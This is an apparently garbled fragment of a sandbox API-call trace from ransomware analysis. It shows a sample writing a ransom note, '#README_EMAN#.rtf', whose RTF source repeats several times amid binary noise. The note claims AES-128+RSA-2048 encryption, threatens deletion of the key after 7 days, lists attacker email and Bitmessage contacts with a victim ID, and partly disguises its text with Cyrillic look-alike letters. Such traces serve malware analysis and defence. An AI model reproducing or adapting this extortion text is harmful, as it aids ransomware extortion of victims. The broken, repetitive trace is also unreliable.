\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0282.145] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0282.146] CloseHandle (hObject=0x2c8) returned 1 [0282.146] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\#readme_eman#.rtf")) returned 0xffffffff [0282.146] GetLastError () returned 0x2 [0282.146] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0282.146] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0282.146] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0282.147] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 